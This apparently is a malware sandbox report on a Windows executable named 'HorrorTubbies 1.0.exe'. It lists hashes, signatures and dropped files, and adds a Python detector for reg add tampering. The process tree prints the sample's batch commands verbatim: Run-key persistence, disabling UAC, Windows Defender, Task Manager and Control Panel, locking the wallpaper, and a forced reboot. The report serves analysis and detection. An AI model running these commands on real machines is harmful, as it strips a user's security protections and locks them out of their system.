Analysis

  • max time kernel
    20s
  • max time network
    22s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240709-en
  • resource tags

    arch:x64
    arch:x86
    image:win10v2004-20240709-en
    locale:en-us
    os:windows10-2004-x64
    system
  • submitted
    16-07-2024 09:36

Errors

Reason
Machine shutdown

General

  • Target

    HorrorTubbies 1.0.exe

  • Size

    11.5MB

  • MD5

    cbefa3dd01682c7ae01476a35c069ca8

  • SHA1

    0a7fde7402d314993d0b77b87b796f480c8bbec4

  • SHA256

    9a8a71e84dbbcea6ca2286d811db5d2df586d01e13654b034f77ffd6dbed599a

  • SHA512

    41a1dff4610230d1cf72c0c42b6c7eef8a12c991cb42ed28cd2268f20f1978b14fba9e17081cdbe411963bc7dcd3273046d1ddc7427f6d9cc117ea592833ed8d

  • SSDEEP

    196608:knW3NrRSIGB4e6rVwKQ8QNeL8W6sXh9rcWdTXfxo5FKKxuAUKPZ7CwI7qMh:kn/r6CKENjsXr9TX5rKRCwI7

Malware Config

Signatures

  • UAC bypass (3 TTPs, 1 IoC)
  • Disables Task Manager via registry modification
  • UPX packed file (3 IoCs)

    Detects executables packed with UPX/modified UPX open source packer.

  • Adds Run key to start application (2 TTPs, 2 IoCs)
  • Sets desktop wallpaper using registry (2 TTPs, 1 IoC)
  • Drops file in Windows directory (6 IoCs)
  • Modifies data under HKEY_USERS (15 IoCs)
  • Modifies registry key (1 TTP, 5 IoCs)
  • Suspicious use of AdjustPrivilegeToken (2 IoCs)
  • Suspicious use of SetWindowsHookEx (1 IoC)
  • Suspicious use of WriteProcessMemory (33 IoCs)

Processes

  • C:\Users\Admin\AppData\Local\Temp\HorrorTubbies 1.0.exe
    "C:\Users\Admin\AppData\Local\Temp\HorrorTubbies 1.0.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1716
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\8CBF.tmp\HorrorTubies.bat""
      2⤵
      • Drops file in Windows directory
      • Suspicious use of WriteProcessMemory
      PID:332
      • C:\Windows\SysWOW64\reg.exe
        reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v mbrsetup /d c:\windows\winbase_base_procid_none\secureloc0x65\mbrsetup.exe /f
        3⤵
        • Adds Run key to start application
        • Modifies registry key
        PID:4176
      • C:\Windows\SysWOW64\reg.exe
        reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v gdifuncs /d c:\windows\winbase_base_procid_none\secureloc0x65\gdifuncs.exe /f
        3⤵
        • Adds Run key to start application
        • Modifies registry key
        PID:1964
      • C:\Windows\SysWOW64\reg.exe
        reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d c:\bg.bmp /f
        3⤵
        • Sets desktop wallpaper using registry
        PID:1396
      • C:\Windows\SysWOW64\rundll32.exe
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        3⤵
        PID:5000
      • C:\Windows\SysWOW64\reg.exe
        reg.exe ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop /v NoChangingWallPaper /t REG_DWORD /d 1 /f
        3⤵
        • Modifies registry key
        PID:4152
      • C:\Windows\SysWOW64\reg.exe
        reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
        3⤵
        • UAC bypass
        • Modifies registry key
        PID:2968
      • C:\Windows\SysWOW64\reg.exe
        Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
        3⤵
        PID:1268
      • C:\Windows\SysWOW64\reg.exe
        REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
        3⤵
        • Modifies registry key
        PID:4156
      • C:\Windows\SysWOW64\reg.exe
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoControlPanel" /t REG_DWORD /d "1" /f
        3⤵
        PID:1648
      • C:\Windows\SysWOW64\shutdown.exe
        shutdown /r /t 00
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:3148
  • C:\Windows\system32\LogonUI.exe
    "LogonUI.exe" /flags:0x4 /state0:0xa39b2055 /state1:0x41c64e6d
    1⤵
    • Modifies data under HKEY_USERS
    • Suspicious use of SetWindowsHookEx
    PID:868
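
The tree is the whole payload: a one-shot batch file whose reg.exe children are persistence and policy writes, closed by shutdown /r. The reboot matters, because EnableLUA is only read at boot, so the UAC change (and the sandbox's "Machine shutdown" error above) follow from that last command. Note also that the two Run values point at c:\windows\winbase_base_procid_none\secureloc0x65\ rather than the %TEMP%\8CBF.tmp\ directory the binaries were dropped in, which is consistent with cmd.exe being flagged for "Drops file in Windows directory". The Python below is an added example for this report, not code from the sample or the sandbox: it parses reg add command lines as they appear in process-creation telemetry (Sysmon event 1, Windows 4688) and flags the writes seen here. SAMPLE_COMMAND_LINES are copied from the tree; the RULES table, its labels, and the helper names (split_cmdline, parse_reg_add, classify, scan) are assumptions made for the example.

```python
"""Flag ``reg add`` command lines matching the registry tampering in the
HorrorTubbies.bat process tree.  Added example, not sample or sandbox code:
SAMPLE_COMMAND_LINES are copied from the tree, RULES/labels/helpers are
assumptions made for the example."""
import ntpath
import re

HIVE_ALIASES = {
    "HKLM": "HKEY_LOCAL_MACHINE", "HKCU": "HKEY_CURRENT_USER", "HKU": "HKEY_USERS",
    "HKCR": "HKEY_CLASSES_ROOT", "HKCC": "HKEY_CURRENT_CONFIG",
}

_POL = r"software\\microsoft\\windows\\currentversion\\policies\\"
# (label, regex on the key path below the hive, value name, data); None = any.
RULES = [
    ("persistence: Run key", r"software\\microsoft\\windows\\currentversion\\run(once)?$", None, None),
    ("uac disabled: EnableLUA=0", _POL + r"system$", "enablelua", "0"),
    ("defender disabled: DisableAntiSpyware=1",
     r"software\\policies\\microsoft\\windows defender$", "disableantispyware", "1"),
    ("user lockout: DisableTaskMgr=1", _POL + r"system$", "disabletaskmgr", "1"),
    ("user lockout: NoControlPanel=1", _POL + r"explorer$", "nocontrolpanel", "1"),
    ("user lockout: NoChangingWallPaper=1", _POL + r"activedesktop$", "nochangingwallpaper", "1"),
    ("wallpaper changed", r"control panel\\desktop$", "wallpaper", None),
]


def split_cmdline(cmdline):
    """Split on whitespace, honouring double quotes.  Backslashes are literal
    (they are path separators here) and quotes are dropped, so /d "1" == /d 1."""
    tokens, cur, in_quotes, have_token = [], [], False, False
    for ch in cmdline:
        if ch == '"':
            in_quotes, have_token = not in_quotes, True
        elif ch.isspace() and not in_quotes:
            if have_token:
                tokens.append("".join(cur))
                cur, have_token = [], False
        else:
            cur.append(ch)
            have_token = True
    if have_token:
        tokens.append("".join(cur))
    return tokens


def parse_reg_add(cmdline):
    """{hive, path, name, type, data, force} for a ``reg add`` line, else None.
    Hive aliases are expanded; type defaults to REG_SZ as reg.exe does."""
    tokens = split_cmdline(cmdline)
    if len(tokens) < 3 or ntpath.basename(tokens[0]).lower() not in ("reg", "reg.exe"):
        return None
    if tokens[1].lower() != "add":
        return None
    hive, _, path = tokens[2].partition("\\")
    entry = {"hive": HIVE_ALIASES.get(hive.upper(), hive.upper()), "path": path,
             "name": None, "type": "REG_SZ", "data": None, "force": False}
    i = 3
    while i < len(tokens):
        flag = tokens[i].lower()
        if flag == "/f":
            entry["force"] = True
            i += 1
        elif flag in ("/v", "/t", "/d") and i + 1 < len(tokens):
            entry[{"/v": "name", "/t": "type", "/d": "data"}[flag]] = tokens[i + 1]
            i += 2
        else:
            i += 1
    entry["type"] = entry["type"].upper()
    return entry


def data_matches(want, got):
    """DWORD data may be decimal or 0x hex on the command line, so compare
    numerically when both sides parse, else case-insensitively as strings."""
    if want is None:
        return True
    if got is None:
        return False
    try:
        return int(got, 0) == int(want, 0)
    except ValueError:
        return got.lower() == want.lower()


def classify(entry):
    """Labels from RULES that apply to one parsed ``reg add``."""
    labels = []
    for label, path_re, name, data in RULES:
        if not re.search(path_re, entry["path"], re.IGNORECASE):
            continue
        if name is not None and (entry["name"] or "").lower() != name:
            continue
        if data_matches(data, entry["data"]):
            labels.append(label)
    return labels


def scan(cmdlines):
    """(label, hive, value name, data) for every rule hit, in input order."""
    hits = []
    for line in cmdlines:
        entry = parse_reg_add(line)
        if entry is not None:
            for label in classify(entry):
                hits.append((label, entry["hive"], entry["name"], entry["data"]))
    return hits


# Constructed input: the command lines from the process tree above.
SAMPLE_COMMAND_LINES = [
    r'C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\8CBF.tmp\HorrorTubies.bat""',
    r'reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v mbrsetup /d c:\windows\winbase_base_procid_none\secureloc0x65\mbrsetup.exe /f',
    r'reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v gdifuncs /d c:\windows\winbase_base_procid_none\secureloc0x65\gdifuncs.exe /f',
    r'reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d c:\bg.bmp /f',
    r'RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters',
    r'reg.exe ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop /v NoChangingWallPaper /t REG_DWORD /d 1 /f',
    r'reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f',
    r'Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f',
    r'REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f',
    r'reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoControlPanel" /t REG_DWORD /d "1" /f',
    r'shutdown /r /t 00',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_COMMAND_LINES):
        print(hit)
```

Run stand-alone it prints eight hits: the two Run values, the wallpaper write, and the five policy DWORDs; cmd.exe, rundll32.exe and shutdown.exe produce nothing. The parser deliberately normalises the things this batch varies (reg vs reg.exe, ADD vs add, HKLM vs HKEY_LOCAL_MACHINE, quoted vs bare arguments, /t omitted), since a rule written against one literal spelling would miss the others.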

Network

MITRE ATT&CK Enterprise v15

Downloads

        • C:\Users\Admin\AppData\Local\Temp\8CBF.tmp\HorrorTubies.bat

          Filesize

          1KB

          MD5

          f014698e88eda534c88ce46a17e34d3c

          SHA1

          5f33f606179fea1404144d60af54fb829ea108b5

          SHA256

          35eda9f76ede828a68e030a5b966fbf6a8c3f67146099eb0a866fb492733c909

          SHA512

          79360bdc41762c105fecb07ca97fb4336394d2189f111b7040643d02c12481561aaf6b47c91c685cb7e4396c1a37d8c8eff5d4965baafe83894948316b35805f

        • C:\Users\Admin\AppData\Local\Temp\8CBF.tmp\bg.bmp

          Filesize

          2.2MB

          MD5

          a91e5b7686d4f631a2bdf654a3a491f1

          SHA1

          d5760f5c7463b588b0c74bbc86237aed136b9fe9

          SHA256

          45991d6379452ead78a54e3be31eb3fe9c6ae386737482192ded081832044aea

          SHA512

          86cee44d58c7d9ed51caffb6cb6b55184a3c4653dc76ca41f4bb8a7c5bef9b67cf7f920db2111c1a838930bf9171ff49e17e042d9d0ce13205f13e7a364e1a3d

        • C:\Users\Admin\AppData\Local\Temp\8CBF.tmp\gdifuncs.exe

          Filesize

          76KB

          MD5

          9b104d42649fa52651a2ec25d7e48322

          SHA1

          d9fe22ef9daf5055519ebb9e4137a7b6b5ffc030

          SHA256

          23aef8bc6d0dcad2089fd08ec5932aba5feab3972b07583fa50d4c794eca5af9

          SHA512

          55794cbd02f8678fdc44dced755ba4cf9d4ed63a30bded6635dc5403ffa2435339422288d48a8ef31fe523b080359b051e86ec8f6823b891e83ed1495fa5daa8

        • C:\Users\Admin\AppData\Local\Temp\8CBF.tmp\mainbgtheme.wav

          Filesize

          13.1MB

          MD5

          1c723b3b9420e04cb8845af8b62a37fa

          SHA1

          3331a0f04c851194405eb9a9ff49c76bfa3d4db0

          SHA256

          6831f471ee3363e981e6a1eb0d722f092b33c9b73c91f9f2a9aafa5cb4c56b29

          SHA512

          41f4005ec2a7e0ee8e0e5f52b9d97f25a64a25bb0f00c85c07c643e4e63ea361b4d86733a0cf719b30ea6af225c4fcaca494f22e8e2f73cda9db906c5a0f12ae

        • C:\Users\Admin\AppData\Local\Temp\8CBF.tmp\mbrsetup.exe

          Filesize

          1.3MB

          MD5

          4f9777b4f603a437abedb856d09d42ba

          SHA1

          9a50bdb720e937ae6a8fd4140233b600414b393e

          SHA256

          c5309feb33af8626132eb1a44e528c3317b5499a87170044eadc56ae82b1bacd

          SHA512

          c6971d5256feb8ebd75b758055843870fd1beede3430efc82f4e3f0dae56d9b9241b0ac8c653d5f5ab3fe61a80729c4e096b169d16d2e09ccb7efcc0be8d49a8

        • memory/1716-0-0x0000000000400000-0x00000000014D1000-memory.dmp

          Filesize

          16.8MB

        • memory/1716-14-0x0000000000400000-0x00000000014D1000-memory.dmp

          Filesize

          16.8MB

        • memory/1716-28-0x0000000000400000-0x00000000014D1000-memory.dmp

          Filesize

          16.8MB